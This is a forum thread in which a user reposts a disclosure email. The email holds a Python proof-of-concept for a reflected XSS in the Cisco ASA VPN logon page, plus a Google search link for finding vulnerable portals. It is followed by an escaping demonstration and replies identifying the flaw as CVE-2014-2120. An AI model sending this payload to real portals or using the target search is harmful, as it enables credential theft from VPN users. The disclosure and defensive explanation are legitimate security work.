So my company blocks this page so I can't check it out much, but this is the email that was forwarded to me
Subject: [FD] Cisco ASA VPN - Zero Day Exploit
Message-ID:
<CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8
# Exploit author: Juan Sacco - jsacco@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to an XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other user's credentials.
# The password recovery form fails to filter properly the hidden inputs fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT reports a CVE Feb 15/2016
# Exploit Pack discloses the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18,000 results in Google alone
import sys
import ssl
import http.client


def run(target, port):
    try:
        # Here goes your custom JS agent code
        payload = "alert(1)"
        # The username parameter is reflected into the logon form: %22 closes
        # the value attribute and the rest adds an accesskey/onclick handler
        vulnerable_url = (
            "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle="
            "&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
            + payload
            + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
        )
        crafted_request = vulnerable_url
        # Start the connection; ASA portals usually carry self-signed
        # certificates, so verification is switched off for this check
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        connection = http.client.HTTPSConnection(target, port, context=context)
        connection.request("GET", crafted_request)
        response = connection.getresponse()
        print("Server status response:", response.status, response.reason)
        data = response.read().decode("utf-8", "replace")
        # Find the injection on the response (the original detection string:
        # the reflected username followed by a backslash-escaped quote)
        vulnerable = "Target is not vulnerable"
        for line in data.splitlines():
            if 'juansacco\\"' in line:
                vulnerable = "Target is vulnerable"
        print("Result of the test:", vulnerable)
        connection.close()
    except Exception as e:
        print("Exploit connection closed " + str(e))


if __name__ == "__main__":
    print("Cisco VPN ASA Exploit - Zero Day")
    print("################################")
    print("Author: Juan Sacco - jsacco@exploitpack.com")
    try:
        target = sys.argv[1]
        port = int(sys.argv[2])
    except (IndexError, ValueError):
        print("Usage: python %s <target> <port>" % sys.argv[0])
        sys.exit(1)
    run(target, port)
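The advisory's claim is that the username from the query string is written into a hidden input without escaping, so a double quote ends the value attribute and everything after it becomes new attributes on the tag. The block below is an added illustration, not code from the forwarded email or from Cisco: it renders a constructed stand-in for that hidden input both unescaped and escaped, feeds the result through Python's html.parser, and reports which attributes a browser would actually see on the element. The template HIDDEN_INPUT and the helper names are assumptions made for the demo; the PAYLOAD is the URL-decoded username the posted exploit sends.

```python
from html import escape
from html.parser import HTMLParser

# Constructed stand-in for the logon form's hidden field (assumption: this is
# not the ASA's real markup, only the shape the advisory describes).
HIDDEN_INPUT = '<input type="hidden" name="username" value="%s">'

# The username value the posted exploit sends, URL-decoded. The trailing
# "sacco" is there to absorb the template's own closing quote.
PAYLOAD = 'juansacco" accesskey=X onclick=alert(1) sacco'


def render_unescaped(username):
    """Vulnerable rendering: the user-controlled value is interpolated verbatim."""
    return HIDDEN_INPUT % username


def render_escaped(username):
    """Hardened rendering: quotes, angle brackets and ampersands become entities,
    which is the correct treatment for a double-quoted attribute context."""
    return HIDDEN_INPUT % escape(username, quote=True)


class _InputCollector(HTMLParser):
    """Records the attribute set of every <input> tag, as a browser would see it."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def parse_inputs(html):
    """Return one attribute dict per <input> element in the rendered markup."""
    parser = _InputCollector()
    parser.feed(html)
    parser.close()
    return parser.inputs


def injected_attributes(html):
    """Attribute names that leaked out of value="..." into the element.
    The template only declares type, name and value; anything else (an event
    handler, an accesskey, junk left over from the breakout) came from input."""
    expected = {"type", "name", "value"}
    leaked = set()
    for attrs in parse_inputs(html):
        leaked |= set(attrs) - expected
    return sorted(leaked)


if __name__ == "__main__":
    for label, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        markup = render(PAYLOAD)
        print("%-9s %s" % (label, markup))
        print("          leaked attributes: %s" % injected_attributes(markup))
```

The unescaped rendering yields an input element carrying accesskey and onclick attributes, which is exactly the condition the posted exploit probes for by looking for its marker string in the response. The escaped rendering keeps the whole payload inside the value attribute as data (the parser hands it back unchanged after entity decoding), so no handler is attached. Note that escaping must match the context the value lands in: HTML entity escaping fixes an attribute sink, but a value echoed inside a JavaScript string on the same page would need JavaScript string escaping instead.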
Paaaaaaaaaaaaaaaaaaaatch those ASAs running VPNs!
It's a Zero day, I don't think there is a patch yet :-(
Apparently this isn't really a 0 day, it's from 2014 or so.
Probably this one from 2013 - https://tools.cisco.com/security/center/viewAlert.x?alertId=30214
Juan Sacco is a pretty good researcher. He has done some talks at big conferences, so I wonder what is going on here. If it was a new XSS that is a 0day I would expect to see more coverage about it.
-Otanx
Search on "Cisco PSIRT Feb 4/2016"
First link is here:
https://securityintelligence.com/news/danger-on-the-perimeter-about-the-cisco-asa-vulnerability/
Click on the Cisco ASA Alert in that page and the reference is
Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability
So my quick google yields results that we've known about for a few days.
I could be wrong though.
Hitting up AS now..
Quote from: ristau5741 on February 19, 2016, 08:07:35 AM
Hitting up AS now..
This is not a new vulnerability. It was fixed and previously disclosed in 2014 and was assigned CVE-2014-2120:
https://tools.cisco.com/security/center/viewAlert.x?alertId=33406